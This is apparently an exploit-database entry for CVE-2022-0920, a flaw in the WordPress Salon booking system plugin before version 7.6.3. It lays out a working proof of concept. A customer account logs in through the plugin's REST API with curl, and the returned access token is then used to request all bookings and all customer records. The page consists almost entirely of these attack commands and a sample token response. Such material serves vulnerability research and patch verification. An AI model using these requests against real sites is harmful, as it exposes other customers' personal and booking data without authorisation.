Exploit for Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure CVE-2022-0920

Name: Exploit for Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure CVE-2022-0920
Rating: 5 (189 reviews)

2022-03-21 | CVSS 5.0

## https://sploitus.com/exploit?id=WPEX-ID:5A5AB7A8-BE67-4F70-925C-9CB1EFF2FBE0
Make a booking to get a customer account

Login via API and get access token: curl "https://example.com/?rest_route=/salon/api/v1/login&name=test@gmail.com&password=11111111"
response: {"status":"OK","access_token":"5ad1d8d73d058958e98987bec31a12d25c14b9ba"}

Send requests to get all bookings/customers data using the access token
curl "http://example.com/?rest_route=/salon/api/v1/bookings/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"
curl "http://example.com/?rest_route=/salon/api/v1/customers/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"